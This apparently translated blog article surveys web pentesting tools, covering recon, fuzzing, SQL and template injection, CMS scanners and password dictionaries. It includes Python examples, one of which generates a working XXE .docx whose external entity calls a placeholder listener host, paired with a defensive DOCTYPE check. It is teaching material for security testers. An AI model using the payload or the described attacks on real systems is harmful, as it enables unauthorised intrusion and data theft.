Web tools, or where to start as a pentester?

We continue our series on useful tools for pentesters. In this article we look at tools for assessing the security of web applications.

A colleague of ours already put together a similar compilation about seven years ago. It is interesting to see which tools have kept or strengthened their positions, and which have faded into the background and are rarely used today.

Note that this list would normally include Burp Suite, but a separate article will be devoted to it and its most useful plugins.

Contents:

Amass

Amass is a Go tool for discovering and enumerating DNS subdomains and mapping an organization's external network. Amass is an OWASP project designed to show what an organization looks like on the Internet to an outsider. It obtains subdomain names in several ways: the tool combines recursive subdomain enumeration with open-source searches.

To discover related network ranges and autonomous system numbers, Amass uses the IP addresses obtained during the run. Everything it gathers is used to build a network map.

Pros:

  • Information-gathering techniques used:
    * DNS: dictionary search for subdomains, subdomain brute force, "smart" search using mutations of the subdomains already found, reverse DNS queries, and a search for DNS servers that accept a zone transfer request (AXFR);

    * Open-source search: Ask, Baidu, Bing, CommonCrawl, DNSDB, DNSDumpster, DNSTable, Dogpile, Exalead, FindSubdomains, Google, IPv4Info, Netcraft, PTRArchive, Riddler, SiteDossier, ThreatCrowd, VirusTotal, Yahoo;

    * TLS certificate database search: Censys, CertDB, CertSpotter, Crtsh, Entrust;

    * Search engine APIs: BinaryEdge, BufferOver, CIRCL, HackerTarget, PassiveTotal, Robtex, SecurityTrails, Shodan, Twitter, Umbrella, URLScan;

    * Web archive search: ArchiveIt, ArchiveToday, Arquivo, LoCArchive, OpenUKArchive, UKGovArchive, Wayback;

  • Integration with Maltego;
  • Gives the most complete coverage of the DNS subdomain discovery task.

Cons:

  • Be careful with amass.netdomains: it tries to contact every IP address in the identified infrastructure and obtain domain names from reverse DNS lookups and TLS certificates. This is a "loud" technique and can reveal your reconnaissance to the organization being assessed.
  • High memory consumption: depending on the settings it can consume up to 2 GB of RAM, which rules out running it in the cloud on a cheap VDS.


Altdns

Altdns is a Python tool for building wordlists for DNS subdomain enumeration. It generates subdomain variants using permutations and substitutions. It takes words that frequently occur in subdomain names (for example test, dev, staging) and applies them as permutations and substitutions to the subdomains already known, which are supplied as Altdns's input. The output is a list of subdomain variants that may exist, and that list can then be used for DNS brute force.

Pros:

  • Works well with large data sets.
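The permutation idea is simple enough to show in full. The block below is an added example written for this article, not Altdns's own code: it takes two already-known subdomains and three words (both constructed inputs) and produces the same kinds of variants the paragraph describes, ready to feed to a DNS brute forcer.

```python
from typing import Iterable, List, Set

# Constructed sample input, not taken from the article: two subdomains that an
# earlier enumeration step found, plus a few words that commonly appear in
# subdomain names.
KNOWN_SUBDOMAINS = ["api.example.com", "www.api.example.com"]
WORDS = ["dev", "staging", "test"]
ROOT = "example.com"


def permute_subdomain(fqdn: str, words: Iterable[str], root: str) -> Set[str]:
    """Build candidate names from one known subdomain.

    For each word this produces the variant shapes an Altdns-style tool
    generates: the word prepended or appended as its own label, the word
    glued to the first label with a hyphen, and the word inserted between
    existing labels. The known name itself is never returned.
    """
    if not fqdn.endswith("." + root):
        raise ValueError(f"{fqdn} is not under {root}")
    labels = fqdn[: -len(root) - 1].split(".")
    variants: Set[str] = set()
    for word in words:
        variants.add(".".join([word] + labels + [root]))                        # dev.api.example.com
        variants.add(".".join(labels + [word, root]))                           # api.dev.example.com
        variants.add(".".join([f"{word}-{labels[0]}"] + labels[1:] + [root]))   # dev-api.example.com
        variants.add(".".join([f"{labels[0]}-{word}"] + labels[1:] + [root]))   # api-dev.example.com
        for i in range(1, len(labels)):                                         # www.dev.api.example.com
            variants.add(".".join(labels[:i] + [word] + labels[i:] + [root]))
    variants.discard(fqdn)
    return variants


def build_wordlist(known: Iterable[str], words: Iterable[str], root: str) -> List[str]:
    """Merge the permutations of every known name into one deduplicated,
    sorted list that a DNS brute forcer such as MassDNS can consume."""
    candidates: Set[str] = set()
    for name in known:
        candidates |= permute_subdomain(name, words, root)
    return sorted(candidates)


if __name__ == "__main__":
    for candidate in build_wordlist(KNOWN_SUBDOMAINS, WORDS, ROOT):
        print(candidate)
```

Two known names and three words already yield 27 candidates; real wordlists multiply this by hundreds of words, which is why the output is deduplicated before it goes to the resolver.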

aquatone

aquatone was previously known as another subdomain discovery tool, but its author dropped that functionality in favour of the Amass mentioned above. aquatone has since been rewritten in Go and is now aimed at preliminary reconnaissance of websites. It takes the specified targets, looks for web servers on a range of ports, then collects everything it can about each site and takes a screenshot. It is handy for a quick first pass over a set of hosts, after which you can pick the priority targets to attack.

Pros:

  • The output is a set of files and directories that are convenient for further work with other tools:
    * An HTML report with the collected screenshots and response headers, grouped by similarity;

    * A file with all the URLs on which websites were found;

    * A file with statistics and page data;

    * A directory of files containing the response headers from the discovered targets;

    * A directory of files containing the response bodies from the discovered targets;

    * Screenshots of the discovered websites;

  • Accepts XML reports from Nmap and Masscan as input;
  • Uses headless Chrome/Chromium to render the screenshots.

Cons:

  • Can attract the attention of intrusion detection systems, so it needs tuning before use.

The screenshot was taken with one of the old versions of aquatone (v0.5.0), which still implemented DNS subdomain search. Old versions can be found on the releases page.

MassDNS

MassDNS is another tool for DNS subdomain discovery. Its main difference is that it sends DNS queries directly to a large number of different resolvers, and does so very quickly.

Pros:

  • Speed: it can resolve more than 350 thousand names per second.

Cons:

  • MassDNS can put a heavy load on the resolvers it uses, which can get those servers blocked or result in complaints to your ISP. It will also put a heavy load on the organization's own DNS servers, if it has any and if they are authoritative for the names you are trying to resolve.
  • The bundled resolver list is out of date, but if you weed out the dead resolvers and add fresh working ones, everything works fine.

Screenshot of aquatone v0.5.0

nsec3map

nsec3map is a Python tool for enumerating the full list of names in a DNSSEC-signed zone by walking its NSEC/NSEC3 chain.

Pros:

  • Quickly discovers the hosts in a DNS zone with a minimal number of queries, provided the zone supports DNSSEC;
  • Comes with a John the Ripper plugin that can be used to crack the NSEC3 hashes it collects.

Cons:

  • Many DNS errors are not handled correctly;
  • There is no automatic parallelization of NSEC record enumeration: you have to split the namespace by hand;
  • High memory consumption.

Acunetix

Acunetix is a web vulnerability scanner that automates the process of checking web applications for security issues. It tests the application for SQL injection, XSS, XXE, SSRF and many other web vulnerabilities. However, as with any other scanner, the breadth of vulnerability classes it covers does not replace a pentester, because it cannot find complex vulnerability chains or flaws in business logic. What it does cover is a great many individual vulnerabilities, including various CVEs, that a pentester could easily forget about, so it is very convenient for taking the routine checks off your hands.

Pros:

  • Low false-positive rate;
  • Results can be exported as reports;
  • Performs a large number of checks for different vulnerabilities;
  • Parallel scanning of multiple hosts.

Cons:

  • No deduplication logic (Acunetix treats functionally identical pages as different ones because their URLs differ), although the developers are working on it;
  • Requires installation on a separate web server, which complicates testing client systems over a VPN connection and using the scanner in an isolated segment of the client's internal network;
  • The service under test can get "noisy", for example when the scanner sends a lot of attack vectors into a contact form on the site, which can seriously disrupt business processes;
  • It is a proprietary and therefore paid solution.


Dirsearch

Dirsearch is a Python tool for brute-forcing directories and files on websites.

Pros:

  • Can tell real "200 OK" pages apart from pages that return "200 OK" but actually say "page not found";
  • Ships with a handy dictionary that strikes a good balance between size and search efficiency. It contains standard paths typical of many CMSes and technology stacks;
  • Has its own dictionary format, which gives good efficiency and flexibility when enumerating files and directories;
  • Convenient output: plain text, JSON;
  • Can throttle, i.e. pause between requests, which matters for fragile services.

Cons:

  • Extensions have to be passed as a single string, which is inconvenient if you need to test many extensions at once;
  • To use your own dictionary, it needs to be adapted slightly to the Dirsearch dictionary format for best results.
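The first pro above, telling a real "200 OK" from a catch-all "not found" page that also returns 200, is worth seeing in code, because a status-code-only scanner reports every path on such a site as a hit. The block below is an added example written for this article, not Dirsearch's own implementation: it fetches a few random paths that cannot exist, keeps their bodies as a baseline, and treats any 200 response whose body is very similar to that baseline as a soft 404. The site it scans is a constructed in-memory stand-in, not a real server.

```python
import difflib
import random
import string
from typing import Callable, Dict, List, Tuple

Response = Tuple[int, str]

# Constructed stand-in for a target site, not a real server: a catch-all
# handler answers every unknown path with "200 OK" and a "not found" page,
# which is exactly the behaviour that fools a status-code-only scanner.
_NOT_FOUND_PAGE = (
    "<html><head><title>Example Corp</title></head><body>"
    "<div class=\"header\">Example Corp</div>"
    "<p>Sorry, the page {path} could not be found on this server.</p>"
    "<div class=\"footer\">&copy; Example Corp</div></body></html>"
)
_REAL_PAGES: Dict[str, Response] = {
    "/admin/": (200, "<html><head><title>Admin</title></head><body><form>Admin login</form></body></html>"),
    "/backup.zip": (200, "PK\x03\x04 ... pretend zip bytes ..."),
    "/old/": (301, ""),
}


def fake_fetch(path: str) -> Response:
    """Stand-in for an HTTP GET against the constructed site."""
    return _REAL_PAGES.get(path, (200, _NOT_FOUND_PAGE.format(path=path)))


def random_path(length: int = 12) -> str:
    return "/" + "".join(random.choices(string.ascii_lowercase, k=length))


def soft404_baseline(fetch: Callable[[str], Response], samples: int = 3) -> List[str]:
    """Request a few paths that certainly do not exist and keep their bodies.
    Anything that looks like these bodies is a 'not found' page, whatever
    status code it carries."""
    return [fetch(random_path())[1] for _ in range(samples)]


def looks_like_soft404(body: str, baseline: List[str], threshold: float = 0.8) -> bool:
    """Compare by similarity ratio rather than equality, because catch-all
    pages usually echo the requested path or a timestamp. autojunk is off so
    the heuristic for long strings does not skew the ratio."""
    return any(
        difflib.SequenceMatcher(None, body, ref, autojunk=False).ratio() >= threshold
        for ref in baseline
    )


def scan(paths: List[str], fetch: Callable[[str], Response] = fake_fetch) -> List[str]:
    """Return the paths a dirsearch-style scanner would report: interesting
    status codes, minus the 200 responses that are really 404s."""
    baseline = soft404_baseline(fetch)
    hits: List[str] = []
    for path in paths:
        status, body = fetch(path)
        if status == 200 and looks_like_soft404(body, baseline):
            continue  # "200 OK" in name only
        if status in (200, 204, 301, 302, 307, 401, 403):
            hits.append(path)
    return hits


if __name__ == "__main__":
    print(scan(["/admin/", "/backup.zip", "/old/", "/nothing-here/", "/login"]))
```

The similarity threshold is the knob to tune per target: sites that embed large dynamic blocks (session-specific menus, random banners) need a lower threshold or a comparison on a normalized body, and a baseline taken from several random paths rather than one avoids latching onto a single transient response.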


wfuzz

wfuzz is a web application fuzzer written in Python, and probably one of the best-known web tools. The principle is simple: wfuzz lets you fuzz any position in an HTTP request, so you can fuzz GET/POST parameters and HTTP headers, including Cookies and other authentication headers. At the same time it is convenient for plain brute force of directories and files, for which you need a good dictionary. It has a flexible filtering system that lets you filter the site's responses by various criteria, which is what makes the results useful.

Pros:

  • Multifunctional: modular architecture, and a new module takes only minutes to assemble;
  • Convenient filtering and fuzzing mechanism;
  • Can fuzz any HTTP method and any position in an HTTP request.

Cons:

  • Still under development.


ffuf

ffuf is a web fuzzer in Go made "in the image and likeness" of wfuzz. It lets you brute-force files, directories, URL paths, names and values of GET/POST parameters, and HTTP headers, including the Host header for brute-forcing virtual hosts. ffuf differs from its older sibling in its much higher speed and a few new features, for example support for Dirsearch-format dictionaries.

Pros:

  • Filters similar to those of wfuzz, which let you configure brute force flexibly;
  • Lets you fuzz HTTP header values, POST request data and various parts of the URL, including the names and values of GET parameters;
  • Any HTTP method can be specified.

Cons:

  • Still under development.


gobuster

gobuster is a Go reconnaissance tool with two modes of operation. The first is used to brute-force files and directories on a website, the second to brute-force DNS subdomains. The tool does not support recursive enumeration of files and directories, which certainly saves time, but on the other hand brute force of every newly found endpoint on the site has to be launched separately.

Pros:

  • High speed in both modes, whether brute-forcing DNS subdomains or files and directories.

Cons:

  • The current version does not support setting HTTP headers;
  • By default only some HTTP status codes (200, 204, 301, 302, 307) are treated as valid.


Arjun

Arjun is a tool for brute-forcing hidden HTTP parameters in GET/POST requests and in JSON. Its built-in dictionary holds 25,980 names, and Arjun checks all of them in about 30 seconds. The trick is that Arjun does not test each parameter separately: it sends roughly 1000 parameters at a time and checks whether the response changed. If it did, it splits those 1000 parameters into two halves and checks which half affects the response. So, with a simple binary search, it finds the one parameter or the few hidden parameters that changed the response and therefore probably exist.

Pros:

  • High speed thanks to the binary search;
  • Support for GET/POST parameters as well as parameters in JSON format.

A Burp Suite plugin, param-miner, works on a similar principle and is also very good at finding hidden HTTP parameters. We will say more about it in the upcoming article on Burp and its plugins.
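The group-testing search described above is short enough to write out. The block below is an added example for this article, not Arjun's own code: the target endpoint is a constructed stand-in that honours two undocumented parameters (the names "debug" and "admin" are assumptions for the demo), and the search sends up to 1000 candidate names per request, bisecting any group that changes the response. A request counter shows the saving over one request per name.

```python
import random
from typing import Callable, Dict, List

# Constructed stand-in for the target endpoint, not a real application: it
# renders a fixed page but changes the output when one of two undocumented
# parameters is present. The parameter names are assumptions for the demo.
_HIDDEN = {"debug", "admin"}


def fake_endpoint(params: Dict[str, str]) -> str:
    body = "<html><body><h1>Welcome</h1></body></html>"
    if "debug" in params:
        body += "<!-- debug: 3 queries, 12 ms -->"
    if "admin" in params:
        body = body.replace("Welcome", "Welcome, administrator")
    return body


class Counter:
    """Wraps a request function and counts calls, so the saving over
    one-request-per-name is visible."""

    def __init__(self, request: Callable[[Dict[str, str]], str]):
        self.request, self.calls = request, 0

    def __call__(self, params: Dict[str, str]) -> str:
        self.calls += 1
        return self.request(params)


def find_hidden_params(candidates: List[str], request: Callable[[Dict[str, str]], str],
                       chunk: int = 1000) -> List[str]:
    """Group testing with bisection, the way the text describes Arjun.

    Send `chunk` names in one request. If the response equals the baseline
    (a request with no parameters at all), none of them matters. Otherwise
    split the group in two and test each half, down to single names. Several
    hidden parameters in one group are all found, because both halves are
    probed whenever the parent group changed the response.
    """
    baseline = request({})
    found: List[str] = []

    def probe(group: List[str]) -> None:
        if request({name: "1" for name in group}) == baseline:
            return
        if len(group) == 1:
            found.append(group[0])
            return
        mid = len(group) // 2
        probe(group[:mid])
        probe(group[mid:])

    for start in range(0, len(candidates), chunk):
        probe(candidates[start:start + chunk])
    return sorted(found)


def demo_wordlist(size: int = 2000, seed: int = 7) -> List[str]:
    """Constructed candidate list: filler names plus the two hidden ones,
    shuffled with a fixed seed so they land in arbitrary but repeatable
    positions."""
    names = [f"param{i}" for i in range(size - len(_HIDDEN))] + sorted(_HIDDEN)
    random.Random(seed).shuffle(names)
    return names


if __name__ == "__main__":
    counted = Counter(fake_endpoint)
    print(find_hidden_params(demo_wordlist(), counted), "in", counted.calls, "requests")
```

Two things a real run has to deal with that this example does not: responses that differ between requests for reasons unrelated to the parameters (timestamps, CSRF tokens), which is why tools compare responses loosely rather than byte for byte, and servers that reject requests with a thousand parameters outright, which forces a smaller chunk size.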

LinkFinder

LinkFinder is a Python script for finding links in JavaScript files. Useful for finding hidden or forgotten endpoints/URLs in a web application.

Pros:

  • Fast;
  • There is a dedicated Chrome extension based on LinkFinder.

Cons:

  • Inconvenient final report;
  • Does not analyze the JavaScript as it runs;
  • The link-finding logic is very simple: if the JavaScript is obfuscated, or the links are not present as literals and are built dynamically, it will not find anything.


JSParser

JSParser is a Python script that uses Tornado and JSBeautifier to parse relative URLs out of JavaScript files. Very useful for discovering AJAX requests and compiling a list of the API methods the application talks to. Works well in tandem with LinkFinder.

Pros:

  • Fast parsing of JavaScript files.
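Both LinkFinder and JSParser boil down to the same core: pull URL-shaped string literals out of JavaScript with a regular expression. The block below is an added example for this article, not either tool's own code, and it serves both sections. The JavaScript it scans is a constructed sample that contains absolute URLs, root-relative and dot-relative paths, a query string and a template literal, plus one line that builds a URL by concatenation to show the limitation noted under LinkFinder's cons.

```python
import re
from typing import List

# Constructed JavaScript sample, not from the article, with the kinds of
# string literals these tools pick out. The "/users/" line builds the URL
# by concatenation, so only the fragment is recoverable statically.
SAMPLE_JS = r'''
var base = "https://api.example.com/v1";
fetch(base + "/users/" + id).then(render);
$.ajax({url: "/internal/admin/export?format=csv", type: "POST"});
const script = './static/app.js';
const items = `/api/${ver}/items`;
const greeting = "Hello, world";
'''

# One regex for both string-literal shapes: an absolute http(s) URL, or a
# path that starts with "/", "./" or "../". The path alternative allows
# query-string and template-literal characters.
_ENDPOINT_RE = re.compile(r'''
    ["'`]                                   # opening quote
    (
        https?://[^"'`\s]+                  # absolute URL
      |
        \.{0,2}/[A-Za-z0-9_\-./?=&%{}$]+    # relative path
    )
    ["'`]                                   # closing quote
''', re.VERBOSE)


def extract_endpoints(js: str) -> List[str]:
    """Return the unique URL-looking string literals found in `js`, sorted."""
    return sorted({m.group(1) for m in _ENDPOINT_RE.finditer(js)})


if __name__ == "__main__":
    for endpoint in extract_endpoints(SAMPLE_JS):
        print(endpoint)
```

Note what comes back for the concatenated line: just "/users/", with the base and the id lost. That is the limitation the LinkFinder section describes, and it is why these tools are a starting point for manual review of the script rather than a substitute for it. The regex also deliberately ignores plain strings such as "Hello, world" that carry no path separator.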


sqlmap

sqlmap is probably the best-known tool for web application testing. sqlmap automates the discovery and exploitation of SQL injection, supports many SQL dialects, and carries a huge number of techniques in its arsenal, from a plain quote to complex vectors for time-based SQL injection. It also has many post-exploitation techniques for various DBMSes, so it is useful not just as a SQL injection scanner but as a powerful tool for exploiting SQL injections that have already been found.

Pros:

  • A large number of different techniques and vectors;
  • Low false-positive rate;
  • Lots of fine-tuning options: various techniques, the target database, tamper scripts for bypassing a WAF;
  • Can dump the retrieved data;
  • Many exploitation capabilities, for example uploading/downloading files and executing commands (RCE) on some databases, and more;
  • Supports connecting directly to the database with the credentials obtained during the attack;
  • Accepts a text file with a request saved from Burp as input, so there is no need to assemble all the command-line parameters by hand.

Cons:

  • Hard to customize, for example to write checks of your own, because the documentation for this is scant;
  • Without proper settings it runs an incomplete set of checks, which can be misleading.


NoSQLMap

NoSQLMap is a Python tool for automating the discovery and exploitation of NoSQL injection. It is convenient not only against NoSQL databases directly, but also when testing web applications that use NoSQL.

Pros:

  • Like sqlmap, it does not just find a potential vulnerability but also checks whether it can be exploited, for MongoDB and CouchDB.

Cons:

  • No support for Redis or Cassandra; development in that direction is only just beginning.

oxml_xxe

oxml_xxe is a tool for embedding XXE payloads into the various file formats that use XML in one form or another.

Pros:

  • Supports many common formats, such as DOCX, ODT, SVG, XML.

Cons:

  • Support for PDF, JPEG and GIF is not fully implemented;
  • Creates only one file. To work around this you can use the docem utility, which can generate many payload files with the payload placed in different locations.

The utilities above do an excellent job of testing for XXE when uploading documents that contain XML. But keep in mind that XML parsers turn up in many other places too; for example, XML may be accepted as a data format in place of JSON.

So we also recommend looking at the following repository, which collects a large number of different payloads.
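What a tool like oxml_xxe actually does for the DOCX case is small enough to show end to end: a .docx is a ZIP container, and the payload is a DOCTYPE with an external entity placed in one of its XML parts. The block below is an added example written for this article, not oxml_xxe's code; the callback URL is a hypothetical listener you would replace with one you control. It also includes the defensive counterpart, a check an upload handler can run before the XML reaches a parser.

```python
import io
import zipfile
from typing import List

# Hypothetical listener URL for the out-of-band check (an assumption for the
# demo, not from the article). Replace it with an endpoint you control.
CALLBACK_URL = "http://xxe-listener.example/hit"

# Minimal OOXML package skeleton: content types, package relationships and
# the main document part.
_CONTENT_TYPES = """<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>"""

_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>"""


def document_xml_with_xxe(callback: str) -> str:
    """word/document.xml with a DOCTYPE declaring an external entity.
    A parser that resolves external entities will fetch `callback` when it
    expands &xxe; inside the paragraph text."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE w:document [
  <!ENTITY xxe SYSTEM "{callback}">
]>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body><w:p><w:r><w:t>&xxe;</w:t></w:r></w:p></w:body>
</w:document>"""


def build_docx(callback: str = CALLBACK_URL) -> bytes:
    """Assemble the three parts into a .docx (a ZIP container) in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", _CONTENT_TYPES)
        z.writestr("_rels/.rels", _RELS)
        z.writestr("word/document.xml", document_xml_with_xxe(callback))
    return buf.getvalue()


def parts_with_doctype(docx_bytes: bytes) -> List[str]:
    """Defensive counterpart: list the XML parts of an uploaded OOXML file
    that carry a DOCTYPE at all. Legitimate Office documents do not need one,
    so an upload handler can reject the file before any parser sees it."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return [
            name for name in z.namelist()
            if (name.endswith(".xml") or name.endswith(".rels"))
            and b"<!DOCTYPE" in z.read(name)
        ]


if __name__ == "__main__":
    payload = build_docx()
    with open("xxe-test.docx", "wb") as f:
        f.write(payload)
    print("parts with DOCTYPE:", parts_with_doctype(payload))
```

The document itself stays a valid package, which is the point: the file has to survive whatever validation the upload form does before the server-side converter or indexer parses word/document.xml. The same DOCTYPE check, applied to every part rather than just the main document, is the cheapest mitigation on the receiving side, alongside disabling external entity resolution in the parser.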

tplmap

tplmap is a Python tool for detecting and exploiting Server-Side Template Injection; its settings and flags resemble sqlmap's. It uses a number of techniques and vectors, including blind injection, and also has techniques for code execution and for uploading/downloading arbitrary files. Its arsenal covers many different template engines and includes some techniques for finding eval()-like code injection in Python, Ruby, PHP and JavaScript. On success it opens an interactive console.

Pros:

  • A large number of different techniques and vectors;
  • Supports many template engines;
  • Many exploitation techniques.

CeWL

CeWL is a wordlist generator in Ruby that extracts the unique words from a given website, following the site's links to a specified depth. The resulting list of unique words can then be used to brute-force passwords on the same site's services, or to crack hashes with hashcat or John the Ripper. It is good for building a "targeted" list of likely passwords.

Pros:

  • Easy to use.

Cons:

  • You need to be careful with the crawl depth so as not to pull in an unrelated domain.

Weakpass

Weakpass is a service hosting many dictionaries of unique passwords. Extremely useful for the whole range of password-cracking tasks, from simple online brute force of accounts on the target's services to offline cracking of captured hashes with hashcat or John the Ripper. It holds roughly 8 billion passwords from 4 to 25 characters long.

Pros:

  • Contains both specialized dictionaries and dictionaries of the most common passwords, so you can pick the one that fits your task;
  • The dictionaries are updated and topped up with new passwords;
  • The dictionaries are ranked by effectiveness. You can pick an option for fast online brute force as well as one for thorough password selection from a large dictionary built from the latest leaks;
  • There is a calculator showing how long cracking would take on your hardware.


We would put the tools for CMS checks into a separate group: WPScan, JoomScan and AEM hacker.

AEM_hacker

AEM hacker is a tool for detecting vulnerabilities in Adobe Experience Manager (AEM) applications.

Pros:

  • Can identify AEM applications from the list of URLs given as input;
  • Contains scripts for obtaining RCE by uploading a JSP shell or by exploiting SSRF.

JoomScan

JoomScan is a Perl tool for automating vulnerability detection in Joomla CMS deployments.

Pros:

  • Can find configuration flaws and problems with administrative settings;
  • Lists Joomla versions and their associated vulnerabilities, as well as those of individual components;
  • Contains more than 1000 exploits for Joomla components;
  • Outputs final reports in text and HTML formats.


WPScan

WPScan is a scanner for WordPress sites; its arsenal covers vulnerabilities in the WordPress engine itself and in some plugins.

Pros:

  • Can list not only vulnerable WordPress plugins and themes, but also obtain a list of users and of TimThumb files;
  • Can run brute-force attacks against WordPress sites.

Cons:

  • Without proper settings it runs an incomplete set of checks, which can be misleading.


In general, different people prefer different tools: each is good in its own way, and what suits one person may not suit another at all. If you think we have unfairly left out a good utility, tell us about it in the comments!

Source: www.habr.com
